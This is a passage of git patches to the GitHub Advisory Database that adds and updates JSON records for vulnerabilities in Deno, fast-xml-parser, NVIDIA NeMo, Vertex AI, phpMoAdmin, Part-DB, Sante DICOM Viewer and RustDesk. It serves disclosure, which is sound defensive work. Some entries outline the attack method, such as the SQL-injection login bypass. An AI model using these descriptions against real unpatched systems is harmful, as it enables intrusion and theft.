a/advisories/github-reviewed/2026/02/GHSA-hmh4-3xvx-q5hr/GHSA-hmh4-3xvx-q5hr.json b/advisories/github-reviewed/2026/02/GHSA-hmh4-3xvx-q5hr/GHSA-hmh4-3xvx-q5hr.json index 75802a5ccab73..6dc5aebef00cd 100644 --- a/advisories/github-reviewed/2026/02/GHSA-hmh4-3xvx-q5hr/GHSA-hmh4-3xvx-q5hr.json +++ b/advisories/github-reviewed/2026/02/GHSA-hmh4-3xvx-q5hr/GHSA-hmh4-3xvx-q5hr.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-hmh4-3xvx-q5hr", - "modified": "2026-02-19T20:31:41Z", + "modified": "2026-02-20T22:20:03Z", "published": "2026-02-19T20:31:41Z", "aliases": [ "CVE-2026-27190" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/denoland/deno/security/advisories/GHSA-hmh4-3xvx-q5hr" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27190" + }, { "type": "WEB", "url": "https://github.com/denoland/deno/commit/9132ad958c83a0d0b199de12b69b877f63edab4c" @@ -60,6 +64,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2026-02-19T20:31:41Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-20T21:19:28Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-m7jm-9gc2-mpf2/GHSA-m7jm-9gc2-mpf2.json b/advisories/github-reviewed/2026/02/GHSA-m7jm-9gc2-mpf2/GHSA-m7jm-9gc2-mpf2.json index 00a2eb0601e16..a514f5842822e 100644 --- a/advisories/github-reviewed/2026/02/GHSA-m7jm-9gc2-mpf2/GHSA-m7jm-9gc2-mpf2.json +++ b/advisories/github-reviewed/2026/02/GHSA-m7jm-9gc2-mpf2/GHSA-m7jm-9gc2-mpf2.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-m7jm-9gc2-mpf2", - "modified": "2026-02-20T18:23:54Z", + "modified": "2026-02-20T22:19:56Z", "published": "2026-02-20T18:23:54Z", "aliases": [ "CVE-2026-25896" @@ -40,6 +40,10 @@ "type": "WEB", "url": "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-m7jm-9gc2-mpf2" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25896" + }, { "type": "WEB", "url": "https://github.com/NaturalIntelligence/fast-xml-parser/commit/943ef0eb1b2d3284e72dd74f44a042ee9f07026e" @@ -64,6 +68,6 @@ "severity": "CRITICAL", "github_reviewed": true, "github_reviewed_at": "2026-02-20T18:23:54Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-20T21:19:27Z" } } \ No newline at end of file From 583028de4a3f1c555d7869c86e8bd1ba621cf357 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 20 Feb 2026 22:39:01 +0000 Subject: [PATCH 30/77] Publish Advisories GHSA-9379-mwvr-7wxx GHSA-hvjw-vp7g-39h5 --- .../GHSA-9379-mwvr-7wxx.json | 33 ++++++++++++++++--- .../GHSA-hvjw-vp7g-39h5.json | 33 ++++++++++++++++--- 2 files changed, 58 insertions(+), 8 deletions(-) rename advisories/{unreviewed => github-reviewed}/2026/02/GHSA-9379-mwvr-7wxx/GHSA-9379-mwvr-7wxx.json (59%) rename advisories/{unreviewed => github-reviewed}/2026/02/GHSA-hvjw-vp7g-39h5/GHSA-hvjw-vp7g-39h5.json (62%) diff --git a/advisories/unreviewed/2026/02/GHSA-9379-mwvr-7wxx/GHSA-9379-mwvr-7wxx.json b/advisories/github-reviewed/2026/02/GHSA-9379-mwvr-7wxx/GHSA-9379-mwvr-7wxx.json similarity index 59% rename from advisories/unreviewed/2026/02/GHSA-9379-mwvr-7wxx/GHSA-9379-mwvr-7wxx.json rename to advisories/github-reviewed/2026/02/GHSA-9379-mwvr-7wxx/GHSA-9379-mwvr-7wxx.json index 6ec1cf8e8ebf9..1ce765c5fc98b 100644 --- a/advisories/unreviewed/2026/02/GHSA-9379-mwvr-7wxx/GHSA-9379-mwvr-7wxx.json +++ b/advisories/github-reviewed/2026/02/GHSA-9379-mwvr-7wxx/GHSA-9379-mwvr-7wxx.json @@ -1,11 +1,12 @@ { "schema_version": "1.4.0", "id": "GHSA-9379-mwvr-7wxx", - "modified": "2026-02-18T15:31:25Z", + "modified": "2026-02-20T22:37:11Z", "published": "2026-02-18T15:31:25Z", "aliases": [ "CVE-2025-33245" ], + "summary": "NVIDIA NeMo Framework contains a vulnerability where malicious data could cause remote code execution", "details": "NVIDIA NeMo Framework contains a vulnerability where malicious data could cause remote code execution. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclosure, and data tampering.", "severity": [ { @@ -13,12 +14,36 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "nemo-toolkit" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.6.1" + } + ] + } + ] + } + ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33245" }, + { + "type": "PACKAGE", + "url": "https://github.com/NVIDIA-NeMo/NeMo" + }, { "type": "WEB", "url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5762" @@ -33,8 +58,8 @@ "CWE-502" ], "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, + "github_reviewed": true, + "github_reviewed_at": "2026-02-20T22:37:11Z", "nvd_published_at": "2026-02-18T14:16:03Z" } } \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-hvjw-vp7g-39h5/GHSA-hvjw-vp7g-39h5.json b/advisories/github-reviewed/2026/02/GHSA-hvjw-vp7g-39h5/GHSA-hvjw-vp7g-39h5.json similarity index 62% rename from advisories/unreviewed/2026/02/GHSA-hvjw-vp7g-39h5/GHSA-hvjw-vp7g-39h5.json rename to advisories/github-reviewed/2026/02/GHSA-hvjw-vp7g-39h5/GHSA-hvjw-vp7g-39h5.json index 7228d86753e3b..9ac6c3e957650 100644 --- a/advisories/unreviewed/2026/02/GHSA-hvjw-vp7g-39h5/GHSA-hvjw-vp7g-39h5.json +++ b/advisories/github-reviewed/2026/02/GHSA-hvjw-vp7g-39h5/GHSA-hvjw-vp7g-39h5.json @@ -1,11 +1,12 @@ { "schema_version": "1.4.0", "id": "GHSA-hvjw-vp7g-39h5", - "modified": "2026-02-18T15:31:26Z", + "modified": "2026-02-20T22:37:37Z", "published": "2026-02-18T15:31:26Z", "aliases": [ "CVE-2025-33253" ], + "summary": "NVIDIA NeMo Framework Deserializes Untrusted Data", "details": "NVIDIA NeMo Framework contains a vulnerability where an attacker could cause remote code execution by convincing a user to load a maliciously crafted file. A successful exploit of this vulnerability might lead to code execution, denial of service, information disclosure, and data tampering.", "severity": [ { @@ -13,12 +14,36 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "nemo-toolkit" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.6.1" + } + ] + } + ] + } + ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33253" }, + { + "type": "PACKAGE", + "url": "https://github.com/NVIDIA-NeMo/NeMo" + }, { "type": "WEB", "url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5762" @@ -33,8 +58,8 @@ "CWE-502" ], "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, + "github_reviewed": true, + "github_reviewed_at": "2026-02-20T22:37:17Z", "nvd_published_at": "2026-02-18T14:16:04Z" } } \ No newline at end of file From 7b171aa127919b8b82302bbd3a3c6d2eec4d27c2 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 20 Feb 2026 22:43:10 +0000 Subject: [PATCH 31/77] Publish Advisories GHSA-qv8j-hgpc-vrq8 GHSA-wh2j-26j7-9728 --- .../GHSA-qv8j-hgpc-vrq8.json | 43 ++++++++++++++++--- .../GHSA-wh2j-26j7-9728.json | 39 ++++++++++++++--- 2 files changed, 72 insertions(+), 10 deletions(-) rename advisories/{unreviewed => github-reviewed}/2026/02/GHSA-qv8j-hgpc-vrq8/GHSA-qv8j-hgpc-vrq8.json (52%) rename advisories/{unreviewed => github-reviewed}/2026/02/GHSA-wh2j-26j7-9728/GHSA-wh2j-26j7-9728.json (56%) diff --git a/advisories/unreviewed/2026/02/GHSA-qv8j-hgpc-vrq8/GHSA-qv8j-hgpc-vrq8.json b/advisories/github-reviewed/2026/02/GHSA-qv8j-hgpc-vrq8/GHSA-qv8j-hgpc-vrq8.json similarity index 52% rename from advisories/unreviewed/2026/02/GHSA-qv8j-hgpc-vrq8/GHSA-qv8j-hgpc-vrq8.json rename to advisories/github-reviewed/2026/02/GHSA-qv8j-hgpc-vrq8/GHSA-qv8j-hgpc-vrq8.json index 713c3e2275151..b99aff96227c0 100644 --- a/advisories/unreviewed/2026/02/GHSA-qv8j-hgpc-vrq8/GHSA-qv8j-hgpc-vrq8.json +++ b/advisories/github-reviewed/2026/02/GHSA-qv8j-hgpc-vrq8/GHSA-qv8j-hgpc-vrq8.json @@ -1,27 +1,60 @@ { "schema_version": "1.4.0", "id": "GHSA-qv8j-hgpc-vrq8", - "modified": "2026-02-20T21:31:24Z", + "modified": "2026-02-20T22:41:45Z", "published": "2026-02-20T21:31:24Z", "aliases": [ "CVE-2026-2472" ], + "summary": "Google Cloud Vertex AI SDK affected by Stored Cross-Site Scripting (XSS)", "details": "Stored Cross-Site Scripting (XSS) in the _genai/_evals_visualization component of Google Cloud Vertex AI SDK (google-cloud-aiplatform) versions from 1.98.0 up to (but not including) 1.131.0 allows an unauthenticated remote attacker to execute arbitrary JavaScript in a victim's Jupyter or Colab environment via injecting script escape sequences into model evaluation results or dataset JSON data.", "severity": [ { "type": "CVSS_V4", - "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:Amber" + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L/U:Amber" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "google-cloud-aiplatform" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.98.0" + }, + { + "fixed": "1.131.0" + } + ] + } + ] } ], - "affected": [], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2472" }, + { + "type": "WEB", + "url": "https://github.com/googleapis/python-aiplatform/commit/8a00d43dbd24e95dbab6ea32c63ce0a5a1849480" + }, { "type": "WEB", "url": "https://docs.cloud.google.com/support/bulletins#gcp-2026-011" + }, + { + "type": "PACKAGE", + "url": "https://github.com/googleapis/python-aiplatform" + }, + { + "type": "WEB", + "url": "https://github.com/googleapis/python-aiplatform/releases/tag/v1.131.0" } ], "database_specific": { @@ -29,8 +62,8 @@ "CWE-79" ], "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, + "github_reviewed": true, + "github_reviewed_at": "2026-02-20T22:41:44Z", "nvd_published_at": "2026-02-20T20:25:24Z" } } \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wh2j-26j7-9728/GHSA-wh2j-26j7-9728.json b/advisories/github-reviewed/2026/02/GHSA-wh2j-26j7-9728/GHSA-wh2j-26j7-9728.json similarity index 56% rename from advisories/unreviewed/2026/02/GHSA-wh2j-26j7-9728/GHSA-wh2j-26j7-9728.json rename to advisories/github-reviewed/2026/02/GHSA-wh2j-26j7-9728/GHSA-wh2j-26j7-9728.json index c06ed9f12a507..b1836d0d7ff3a 100644 --- a/advisories/unreviewed/2026/02/GHSA-wh2j-26j7-9728/GHSA-wh2j-26j7-9728.json +++ b/advisories/github-reviewed/2026/02/GHSA-wh2j-26j7-9728/GHSA-wh2j-26j7-9728.json @@ -1,19 +1,40 @@ { "schema_version": "1.4.0", "id": "GHSA-wh2j-26j7-9728", - "modified": "2026-02-20T21:31:24Z", + "modified": "2026-02-20T22:41:41Z", "published": "2026-02-20T21:31:24Z", "aliases": [ "CVE-2026-2473" ], + "summary": "Google Cloud Vertex AI has a a vulnerability involving predictable bucket naming", "details": "Predictable bucket naming in Vertex AI Experiments in Google Cloud Vertex AI from version 1.21.0 up to (but not including) 1.133.0 on Google Cloud Platform allows an unauthenticated remote attacker to achieve cross-tenant remote code execution, model theft, and poisoning via pre-creating predictably named Cloud Storage buckets (Bucket Squatting).\n\nThis vulnerability was patched and no customer action is needed.", "severity": [ { "type": "CVSS_V4", - "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:Clear" + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/U:Clear" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "google-cloud-aiplatform" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.21.0" + }, + { + "fixed": "1.133.0" + } + ] + } + ] } ], - "affected": [], "references": [ { "type": "ADVISORY", @@ -22,6 +43,14 @@ { "type": "WEB", "url": "https://docs.cloud.google.com/support/bulletins#gcp-2026-012" + }, + { + "type": "PACKAGE", + "url": "https://github.com/googleapis/python-aiplatform" + }, + { + "type": "WEB", + "url": "https://github.com/googleapis/python-aiplatform/releases/tag/v1.133.0" } ], "database_specific": { @@ -29,8 +58,8 @@ "CWE-340" ], "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, + "github_reviewed": true, + "github_reviewed_at": "2026-02-20T22:41:41Z", "nvd_published_at": "2026-02-20T20:25:24Z" } } \ No newline at end of file From c0da40ae0be697a1671c5f7c16c52d7c857b7ad5 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Sat, 21 Feb 2026 00:33:03 +0000 Subject: [PATCH 32/77] Advisory Database Sync --- .../GHSA-2h8m-3jwj-j68m.json | 48 +++++++++++++++ .../GHSA-2wwg-wcjv-q464.json | 48 +++++++++++++++ .../GHSA-4cqv-6xj6-7w79.json | 36 +++++++++++ .../GHSA-4jqp-h8f8-5fh9.json | 40 +++++++++++++ .../GHSA-59vc-4mm8-j289.json | 48 +++++++++++++++ .../GHSA-65c4-vf29-7265.json | 48 +++++++++++++++ .../GHSA-6q4c-4x29-76qv.json | 40 +++++++++++++ .../GHSA-7c63-32m9-7mfg.json | 40 +++++++++++++ .../GHSA-7h2v-5mq4-f627.json | 36 +++++++++++ .../GHSA-8j7g-rjc3-pcjw.json | 48 +++++++++++++++ .../GHSA-8pcr-7mgm-xjqp.json | 48 +++++++++++++++ .../GHSA-8r4q-6953-w8gp.json | 36 +++++++++++ .../GHSA-8w2x-hhv3-2m76.json | 48 +++++++++++++++ .../GHSA-974r-v62q-8fqc.json | 40 +++++++++++++ .../GHSA-9j8v-79v3-wcmp.json | 36 +++++++++++ .../GHSA-9pq7-r6qx-2rhf.json | 40 +++++++++++++ .../GHSA-9xmv-j327-gw5g.json | 40 +++++++++++++ .../GHSA-c478-8rj5-w9cv.json | 48 +++++++++++++++ .../GHSA-fhrj-59h8-j7gf.json | 48 +++++++++++++++ .../GHSA-fjxv-44q5-26f4.json | 48 +++++++++++++++ .../GHSA-gq3w-7jj3-x7gr.json | 40 +++++++++++++ .../GHSA-hc96-x3gj-mp7g.json | 48 +++++++++++++++ .../GHSA-q2r8-vmq7-fpx2.json | 40 +++++++++++++ .../GHSA-q2wq-f7jq-885v.json | 48 +++++++++++++++ .../GHSA-q77w-wghg-55fv.json | 40 +++++++++++++ .../GHSA-q8fp-vccx-9w2h.json | 36 +++++++++++ .../GHSA-qp8f-9474-hr27.json | 40 +++++++++++++ .../GHSA-qqfx-94p8-6p39.json | 48 +++++++++++++++ .../GHSA-r872-6r9v-fwgg.json | 48 +++++++++++++++ .../GHSA-rc45-jprg-5pmq.json | 36 +++++++++++ .../GHSA-rwr9-9r33-h7x4.json | 40 +++++++++++++ .../GHSA-vm4c-6g35-79xf.json | 60 +++++++++++++++++++ .../GHSA-w9fh-vjwm-p6c4.json | 48 +++++++++++++++ .../GHSA-wx92-h8q5-hfm6.json | 40 +++++++++++++ .../GHSA-xhcq-9mcp-rrvr.json | 40 +++++++++++++ .../GHSA-xwhr-hxqf-pv44.json | 36 +++++++++++ 36 files changed, 1552 insertions(+) create mode 100644 advisories/unreviewed/2026/02/GHSA-2h8m-3jwj-j68m/GHSA-2h8m-3jwj-j68m.json create mode 100644 advisories/unreviewed/2026/02/GHSA-2wwg-wcjv-q464/GHSA-2wwg-wcjv-q464.json create mode 100644 advisories/unreviewed/2026/02/GHSA-4cqv-6xj6-7w79/GHSA-4cqv-6xj6-7w79.json create mode 100644 advisories/unreviewed/2026/02/GHSA-4jqp-h8f8-5fh9/GHSA-4jqp-h8f8-5fh9.json create mode 100644 advisories/unreviewed/2026/02/GHSA-59vc-4mm8-j289/GHSA-59vc-4mm8-j289.json create mode 100644 advisories/unreviewed/2026/02/GHSA-65c4-vf29-7265/GHSA-65c4-vf29-7265.json create mode 100644 advisories/unreviewed/2026/02/GHSA-6q4c-4x29-76qv/GHSA-6q4c-4x29-76qv.json create mode 100644 advisories/unreviewed/2026/02/GHSA-7c63-32m9-7mfg/GHSA-7c63-32m9-7mfg.json create mode 100644 advisories/unreviewed/2026/02/GHSA-7h2v-5mq4-f627/GHSA-7h2v-5mq4-f627.json create mode 100644 advisories/unreviewed/2026/02/GHSA-8j7g-rjc3-pcjw/GHSA-8j7g-rjc3-pcjw.json create mode 100644 advisories/unreviewed/2026/02/GHSA-8pcr-7mgm-xjqp/GHSA-8pcr-7mgm-xjqp.json create mode 100644 advisories/unreviewed/2026/02/GHSA-8r4q-6953-w8gp/GHSA-8r4q-6953-w8gp.json create mode 100644 advisories/unreviewed/2026/02/GHSA-8w2x-hhv3-2m76/GHSA-8w2x-hhv3-2m76.json create mode 100644 advisories/unreviewed/2026/02/GHSA-974r-v62q-8fqc/GHSA-974r-v62q-8fqc.json create mode 100644 advisories/unreviewed/2026/02/GHSA-9j8v-79v3-wcmp/GHSA-9j8v-79v3-wcmp.json create mode 100644 advisories/unreviewed/2026/02/GHSA-9pq7-r6qx-2rhf/GHSA-9pq7-r6qx-2rhf.json create mode 100644 advisories/unreviewed/2026/02/GHSA-9xmv-j327-gw5g/GHSA-9xmv-j327-gw5g.json create mode 100644 advisories/unreviewed/2026/02/GHSA-c478-8rj5-w9cv/GHSA-c478-8rj5-w9cv.json create mode 100644 advisories/unreviewed/2026/02/GHSA-fhrj-59h8-j7gf/GHSA-fhrj-59h8-j7gf.json create mode 100644 advisories/unreviewed/2026/02/GHSA-fjxv-44q5-26f4/GHSA-fjxv-44q5-26f4.json create mode 100644 advisories/unreviewed/2026/02/GHSA-gq3w-7jj3-x7gr/GHSA-gq3w-7jj3-x7gr.json create mode 100644 advisories/unreviewed/2026/02/GHSA-hc96-x3gj-mp7g/GHSA-hc96-x3gj-mp7g.json create mode 100644 advisories/unreviewed/2026/02/GHSA-q2r8-vmq7-fpx2/GHSA-q2r8-vmq7-fpx2.json create mode 100644 advisories/unreviewed/2026/02/GHSA-q2wq-f7jq-885v/GHSA-q2wq-f7jq-885v.json create mode 100644 advisories/unreviewed/2026/02/GHSA-q77w-wghg-55fv/GHSA-q77w-wghg-55fv.json create mode 100644 advisories/unreviewed/2026/02/GHSA-q8fp-vccx-9w2h/GHSA-q8fp-vccx-9w2h.json create mode 100644 advisories/unreviewed/2026/02/GHSA-qp8f-9474-hr27/GHSA-qp8f-9474-hr27.json create mode 100644 advisories/unreviewed/2026/02/GHSA-qqfx-94p8-6p39/GHSA-qqfx-94p8-6p39.json create mode 100644 advisories/unreviewed/2026/02/GHSA-r872-6r9v-fwgg/GHSA-r872-6r9v-fwgg.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rc45-jprg-5pmq/GHSA-rc45-jprg-5pmq.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rwr9-9r33-h7x4/GHSA-rwr9-9r33-h7x4.json create mode 100644 advisories/unreviewed/2026/02/GHSA-vm4c-6g35-79xf/GHSA-vm4c-6g35-79xf.json create mode 100644 advisories/unreviewed/2026/02/GHSA-w9fh-vjwm-p6c4/GHSA-w9fh-vjwm-p6c4.json create mode 100644 advisories/unreviewed/2026/02/GHSA-wx92-h8q5-hfm6/GHSA-wx92-h8q5-hfm6.json create mode 100644 advisories/unreviewed/2026/02/GHSA-xhcq-9mcp-rrvr/GHSA-xhcq-9mcp-rrvr.json create mode 100644 advisories/unreviewed/2026/02/GHSA-xwhr-hxqf-pv44/GHSA-xwhr-hxqf-pv44.json diff --git a/advisories/unreviewed/2026/02/GHSA-2h8m-3jwj-j68m/GHSA-2h8m-3jwj-j68m.json b/advisories/unreviewed/2026/02/GHSA-2h8m-3jwj-j68m/GHSA-2h8m-3jwj-j68m.json new file mode 100644 index 0000000000000..f8cf81062ab8b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-2h8m-3jwj-j68m/GHSA-2h8m-3jwj-j68m.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2h8m-3jwj-j68m", + "modified": "2026-02-21T00:31:43Z", + "published": "2026-02-21T00:31:43Z", + "aliases": [ + "CVE-2019-25454" + ], + "details": "phpMoAdmin 1.1.5 contains a stored cross-site scripting vulnerability that allows unauthenticated attackers to inject malicious scripts by manipulating the collection parameter. Attackers can send GET requests to moadmin.php with script payloads in the collection parameter during collection creation to execute arbitrary JavaScript in users' browsers.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25454" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/46082" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/phpmoadmin-stored-cross-site-scripting-via-collection-parameter" + }, + { + "type": "WEB", + "url": "http://www.phpmoadmin.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T23:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-2wwg-wcjv-q464/GHSA-2wwg-wcjv-q464.json b/advisories/unreviewed/2026/02/GHSA-2wwg-wcjv-q464/GHSA-2wwg-wcjv-q464.json new file mode 100644 index 0000000000000..cee8affb6995a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-2wwg-wcjv-q464/GHSA-2wwg-wcjv-q464.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2wwg-wcjv-q464", + "modified": "2026-02-21T00:31:42Z", + "published": "2026-02-21T00:31:42Z", + "aliases": [ + "CVE-2019-25432" + ], + "details": "Part-DB 0.4 contains an authentication bypass vulnerability that allows unauthenticated attackers to login by injecting SQL syntax into authentication parameters. Attackers can submit a single quote followed by 'or' in the login form to bypass credential validation and gain unauthorized access to the application.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25432" + }, + { + "type": "WEB", + "url": "https://github.com/Part-DB/Part-DB" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47547" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/part-db-authentication-bypass-via-loginphp" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T23:15:59Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-4cqv-6xj6-7w79/GHSA-4cqv-6xj6-7w79.json b/advisories/unreviewed/2026/02/GHSA-4cqv-6xj6-7w79/GHSA-4cqv-6xj6-7w79.json new file mode 100644 index 0000000000000..71279c4406c6c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-4cqv-6xj6-7w79/GHSA-4cqv-6xj6-7w79.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4cqv-6xj6-7w79", + "modified": "2026-02-21T00:31:43Z", + "published": "2026-02-21T00:31:43Z", + "aliases": [ + "CVE-2026-2034" + ], + "details": "Sante DICOM Viewer Pro DCM File Parsing Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Sante DICOM Viewer Pro. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the parsing of DCM files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-28129.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2034" + }, + { + "type": "WEB", + "url": "https://www.zerodayinitiative.com/advisories/ZDI-26-104" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-120" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T23:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-4jqp-h8f8-5fh9/GHSA-4jqp-h8f8-5fh9.json b/advisories/unreviewed/2026/02/GHSA-4jqp-h8f8-5fh9/GHSA-4jqp-h8f8-5fh9.json new file mode 100644 index 0000000000000..fc5daae8ef597 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-4jqp-h8f8-5fh9/GHSA-4jqp-h8f8-5fh9.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4jqp-h8f8-5fh9", + "modified": "2026-02-21T00:31:43Z", + "published": "2026-02-21T00:31:43Z", + "aliases": [ + "CVE-2026-2490" + ], + "details": "RustDesk Client for Windows Transfer File Link Following Information Disclosure Vulnerability. This vulnerability allows local attackers to disclose sensitive information on affected installations of RustDesk Client for Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.\n\nThe specific flaw exists within the Transfer File feature. By uploading a symbolic link, an attacker can abuse the service to read arbitrary files. An attacker can leverage this vulnerability to disclose information in the context of SYSTEM. Was ZDI-CAN-27909.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2490" + }, + { + "type": "WEB", + "url": "https://github.com/rustdesk/rustdesk/pull/13736" + }, + { + "type": "WEB", + "url": "https://www.zerodayinitiative.com/advisories/ZDI-26-117" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-59" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T23:16:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-59vc-4mm8-j289/GHSA-59vc-4mm8-j289.json b/advisories/unreviewed/2026/02/GHSA-59vc-4mm8-j289/GHSA-59vc-4mm8-j289.json new file mode 100644 index 0000000000000..d650fcd596d81 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-59vc-4mm8-j289/GHSA-59vc-4mm8-j289.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-59vc-4mm8-j289", + "modified": "2026-02-21T00:31:42Z", + "published": "2026-02-21T00:31:42Z", + "aliases": [ + 